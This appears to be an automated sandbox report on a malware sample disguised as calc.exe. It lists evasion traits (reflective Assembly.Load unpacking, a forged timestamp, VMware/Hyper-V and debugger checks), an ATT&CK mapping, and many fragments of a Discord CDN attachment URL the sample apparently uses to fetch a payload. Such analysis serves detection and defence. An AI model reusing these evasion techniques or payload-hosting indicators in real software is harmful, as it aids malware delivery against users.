Source: Binary string: ncryptsslp.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: wmswsock.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: version.pdb source: WerFault.exe, 00000005.00000003.267521490.000000000546A000.00000004.00000040.sdmp
Source: Binary string: System.Xml.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp, WER2DC6.tmp.dmp.5.dr
Source: Binary string: System.pdb source: calc.exe, 00000000.00000000.254647015.0000000002729000.00000004.00000001.sdmp, WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp, WER2DC6.tmp.dmp.5.dr
Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000005.00000003.267702128.0000000005460000.00000004.00000040.sdmp
Source: Binary string: psapi.pdb source: WerFault.exe, 00000005.00000003.267521490.000000000546A000.00000004.00000040.sdmp
Source: Binary string: fwpuclnt.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: ntasn1.pdb* source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000005.00000003.267503853.0000000005462000.00000004.00000040.sdmp
Source: Binary string: C:\Users\jpint\OneDrive\Desktop\BuilderBot\BuilderBot\bin\Release\stub\un_priv\DarkEdition\obj\Release\calc.pdb source: calc.exe
Source: Binary string: System.Core.pdbx source: WerFault.exe, 00000005.00000002.291489220.0000000005750000.00000004.00000001.sdmp
Source: Binary string: mscoreei.pdb source: WerFault.exe, 00000005.00000003.267503853.0000000005462000.00000004.00000040.sdmp
Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000005.00000003.267503853.0000000005462000.00000004.00000040.sdmp
Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 00000005.00000003.260585475.0000000002F53000.00000004.00000001.sdmp
Source: Binary string: calc.pdb source: WerFault.exe, 00000005.00000003.267591215.0000000005491000.00000004.00000001.sdmp, WER2DC6.tmp.dmp.5.dr
Source: Binary string: combase.pdbk source: WerFault.exe, 00000005.00000003.267503853.0000000005462000.00000004.00000040.sdmp
Source: Binary string: System.Core.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp, WER2DC6.tmp.dmp.5.dr
Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000005.00000003.267521490.000000000546A000.00000004.00000040.sdmp
Source: Binary string: bcryptprimitives.pdbk source: WerFault.exe, 00000005.00000003.267503853.0000000005462000.00000004.00000040.sdmp
Source: Binary string: wuser32.pdb source: WerFault.exe, 00000005.00000003.267521490.000000000546A000.00000004.00000040.sdmp
Source: Binary string: System.Core.pdbh source: WER2DC6.tmp.dmp.5.dr
Source: Binary string: System.ni.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp, WER2DC6.tmp.dmp.5.dr
Source: Binary string: cryptbase.pdbk source: WerFault.exe, 00000005.00000003.267503853.0000000005462000.00000004.00000040.sdmp
Source: Binary string: crypt32.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: msasn1.pdb@ source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp

Data Obfuscation:

.NET source code contains potential unpackerShow sources
Source: calc.exe, DarkEdition/signature.cs.Net Code: revert System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.0.calc.exe.320000.1.unpack, DarkEdition/signature.cs.Net Code: revert System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.0.calc.exe.320000.0.unpack, DarkEdition/signature.cs.Net Code: revert System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.2.calc.exe.320000.0.unpack, DarkEdition/signature.cs.Net Code: revert System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.0.calc.exe.320000.2.unpack, DarkEdition/signature.cs.Net Code: revert System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: calc.exeStatic PE information: 0xFB362630 [Mon Jul 23 10:32:16 2103 UTC]
Source: C:\Windows\SysWOW64\WerFault.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
Source: C:\Users\user\Desktop\calc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\calc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\calc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\calc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\calc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\calc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\calc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\calc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\calc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\calc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\calc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\calc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\calc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\calc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\calc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\calc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\calc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\calc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\calc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\calc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\calc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\calc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\calc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\calc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\calc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\calc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\calc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\calc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\calc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\calc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\calc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\calc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\calc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\calc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\calc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\calc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\calc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: Amcache.hve.5.drBinary or memory string: VMware
Source: Amcache.hve.5.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
Source: WerFault.exe, 00000005.00000002.291345050.0000000004F73000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWX
Source: Amcache.hve.5.drBinary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.5.drBinary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.5.drBinary or memory string: VMware, Inc.
Source: Amcache.hve.5.drBinary or memory string: VMware Virtual disk SCSI Disk Devicehbin
Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.5.drBinary or memory string: VMware7,1
Source: Amcache.hve.5.drBinary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.5.drBinary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.5.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.13989454.B64.1906190538,BiosReleaseDate:06/19/2019,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: WerFault.exe, 00000005.00000002.291282032.0000000004EB9000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
Source: Amcache.hve.5.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.5.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.5.drBinary or memory string: VMware, Inc.me
Source: Amcache.hve.5.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.5.drBinary or memory string: VMware-42 35 bb 32 33 75 d2 27-52 00 3c e2 4b d4 32 71
Source: Amcache.hve.5.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
Source: C:\Users\user\Desktop\calc.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\calc.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\calc.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\Desktop\calc.exeMemory allocated: page read and write | page guardJump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)Show sources
Source: C:\Users\user\Desktop\calc.exeDomain query: cdn.discordapp.com
Source: C:\Users\user\Desktop\calc.exeNetwork Connect: 443Jump to behavior
Source: calc.exe, 00000000.00000000.254367782.0000000001060000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
Source: calc.exe, 00000000.00000000.254367782.0000000001060000.00000002.00020000.sdmpBinary or memory string: Progman
Source: calc.exe, 00000000.00000000.254367782.0000000001060000.00000002.00020000.sdmpBinary or memory string: SProgram Managerl
Source: calc.exe, 00000000.00000000.254367782.0000000001060000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd,
Source: calc.exe, 00000000.00000000.254367782.0000000001060000.00000002.00020000.sdmpBinary or memory string: Progmanlock
Source: C:\Users\user\Desktop\calc.exeQueries volume information: C:\Users\user\Desktop\calc.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\calc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: Amcache.hve.5.drBinary or memory string: msmpeng.exe
Source: Amcache.hve.5.drBinary or memory string: c:\program files\windows defender\msmpeng.exe

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsWindows Management InstrumentationPath InterceptionProcess Injection12Virtualization/Sandbox Evasion1OS Credential DumpingQuery Registry1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemorySecurity Software Discovery21Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection12Security Account ManagerVirtualization/Sandbox Evasion1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Software Packing1NTDSProcess Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol14SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptTimestomp1LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Information Discovery12VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

Behavior Graph

Hide Legend


  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet



This section contains all screenshots as thumbnails, including those not shown in the slideshow.


Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

calc.exe100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches


No Antivirus matches


https://cdn.discor0%URL Reputationsafe
https://cdn.discord0%URL Reputationsafe
https://cdn.discordapp.co0%URL Reputationsafe
https://cdn.discordapp.0%Avira URL Cloudsafe
https://cdn.disc0%URL Reputationsafe
https://cdn.disco0%URL Reputationsafe
https://cdn.discorda0%URL Reputationsafe
https://cdn.d0%URL Reputationsafe
https://cdn.discordap0%URL Reputationsafe
https://cdn.dis0%URL Reputationsafe
https://cdn.discordapp.com40%URL Reputationsafe
https://cdn.discordapp0%URL Reputationsafe
https://cdn.di0%URL Reputationsafe
https://cdn.discordapp.comD80%Avira URL Cloudsafe
https://cdn.discordapp.c0%URL Reputationsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        https://cdn.discordapp.com/attachments/8972calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthrhttp://schemas.xmlsoap.org/ws/2005WerFault.exe, 00000005.00000003.265173725.00000000059A0000.00000004.00000001.sdmpfalse
            https://cdn.discordapp.com/attachmentcalc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
              https://cdn.discordapp.com/attachments/897223707649515602/897228595318124554/ascii_ARTcalc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressxhttp://schemas.xmlsoap.org/ws/200WerFault.exe, 00000005.00000003.265173725.00000000059A0000.00000004.00000001.sdmpfalse
                  https://cdn.discordapp.com/attachments/897223calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                    https://cdn.discorcalc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    https://cdn.discordcalc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    https://cdn.discordapp.com/atcalc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                      https://cdn.discordapp.cocalc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovinceWerFault.exe, 00000005.00000003.265173725.00000000059A0000.00000004.00000001.sdmpfalse
                        https://cdn.discordapp.com/attachmcalc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                          https://cdn.discordapp.com/attachments/897223707649515602/8972285calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                            https://cdn.discordapp.calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            https://cdn.discordapp.com/attachments/897223707649515602/897228595318124554/ascicalc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authenticationWerFault.exe, 00000005.00000003.265173725.00000000059A0000.00000004.00000001.sdmpfalse
                                https://cdn.disccalc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishednamejhttp://schemas.xmlsoap.oWerFault.exe, 00000005.00000003.265173725.00000000059A0000.00000004.00000001.sdmpfalse
                                  https://cdn.discocalc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysidWerFault.exe, 00000005.00000003.265173725.00000000059A0000.00000004.00000001.sdmpfalse
                                    https://cdn.discordacalc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    https://cdn.discordapp.com/attachments/897223707649515602calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                      https://cdn.discordapp.com/attachments/897223707649515602/897228595318124554/acalc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecisionzhttp://schemas.xmlsoap.oWerFault.exe, 00000005.00000003.265173725.00000000059A0000.00000004.00000001.sdmpfalse
                                          https://cdn.dcalc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          https://cdn.discordapp.com/attachments/897223707649515calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                            https://cdn.discordapp.com/attachments/calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                              https://cdn.discordapp.com/attacalc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                                https://cdn.discordapp.com/attachments/897223707649515602/897228595318124554/asciicalc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                                  https://cdn.discordapp.com/attachments/897223707649515602/89722calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namecalc.exe, 00000000.00000002.293201383.0000000002677000.00000004.00000001.sdmp, WerFault.exe, 00000005.00000003.265173725.00000000059A0000.00000004.00000001.sdmpfalse
                                                      https://cdn.discordapp.com/attachments/8972237076calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                                        https://cdn.discordapp.com/attachments/897223707649calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifierWerFault.exe, 00000005.00000003.265173725.00000000059A0000.00000004.00000001.sdmpfalse
                                                            https://cdn.discordapcalc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            https://cdn.discordapp.com/attachments/897223707calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                                              https://cdn.discalc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              https://cdn.discordapp.com/attcalc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                                                https://cdn.discordapp.com/attachments/897223707649515602/calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                                                  https://cdn.discordapp.com/attachments/897223707649515602/897228595318124554calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                                                    https://cdn.discordapp.com/attachments/897223707649515602/8972calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                                                      https://cdn.discordapp.com/attachments/897223707649515602/8972285953181245calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                                                        https://cdn.discordapp.com/attachments/897223707649515602/89722859531812455calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                                                          https://cdn.discordapp.com/attachments/897223707649515602/89722859531calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                                                            https://cdn.discordapp.com/attachments/897calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                                                              https://cdn.discordapp.com/attachments/89722370764calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                                                                https://cdn.discordapp.com/attachments/897223707649515602/897228595318124calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                                                                  https://cdn.discordapp.com/attachments/8972237076495156calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                                                                    https://cdn.discordapp.com/attachments/897223707649515602/897228595318124554/ascii_ARcalc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                                                                      https://cdn.discordapp.com/attachments/89722370calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                                                                        https://cdn.discordapp.com/attaccalc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                                                                          https://cdn.discordapp.com/attachments/897223707649515602/897228595318124554/asccalc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                                                                            https://cdn.discordapp.com/calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                                                                              https://cdn.discordapp.com/attachments/897223707649515602/897228595calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                                                                                https://cdn.discordapp.com/attachments/897223707649515602/8calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddresszhttp://schemas.xmlsoap.org/ws/20WerFault.exe, 00000005.00000003.265173725.00000000059A0000.00000004.00000001.sdmpfalse
                                                                                                    https://cdn.discordapp.com/attachments/897223707649515602/8972285953calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                                                                                      https://cdn.discordapp.com4calc.exe, 00000000.00000002.293201383.0000000002677000.00000004.00000001.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      https://cdn.discordapp.com/attachments/89722370764951calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                                                                                        https://cdn.discordapp.com/attachcalc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                                                                                          https://cdn.discordapp.com/attachments/897223707649515602/897228595318124554/calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                                                                                            https://cdn.discordappcalc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            http://cdn.discordapp.comcalc.exe, 00000000.00000002.293292330.0000000002691000.00000004.00000001.sdmpfalse
                                                                                                              https://cdn.discordapp.com/attachments/897223707649515602/89722859calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                                                                                                https://cdn.dicalc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                https://cdn.discordapp.com/attachments/8972237calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                                                                                                  https://cdn.discordapp.com/attachments/897223707649515602/89722859531812calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                                                                                                    https://cdn.discordapp.com/attachments/89calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                                                                                                      https://cdn.discordapp.comD8calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      https://cdn.discordapp.ccalc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      https://cdn.discordapp.com/attachments/897223707649515602/897228595318calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                                                                                                        https://cdn.discordapp.com/attachmentscalc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                                                                                                          https://cdn.discordapp.com/attachments/8calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                                                                                                            https://cdn.discordapp.com/attachments/89722370764951560calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                                                                                                              https://cdn.discordapp.com/attachments/897223707649515602/897228595318124554/ascii_ART.calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                                                                                                                https://cdn.discordapp.com/attachments/897223707649515602/897228595318124554/ascii_ART.txcalc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                                                                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/otherphoneWerFault.exe, 00000005.00000003.265173725.00000000059A0000.00000004.00000001.sdmpfalse
                                                                                                                                    https://cdn.discordapp.com/attachments/89722calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                                                                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/mobilephoneWerFault.exe, 00000005.00000003.265173725.00000000059A0000.00000004.00000001.sdmpfalse
                                                                                                                                          https://cdn.discordapp.com/attachments/897223707649515602/897228595318124554/ascii_Acalc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                                                                                                                            https://cdn.discordapp.comcalc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                                                                                                                              https://cdn.discordapp.com/attachmencalc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                                                                                                                                https://cdn.discordapp.com/attachments/897223707649515602/897228595318124554/ascalc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
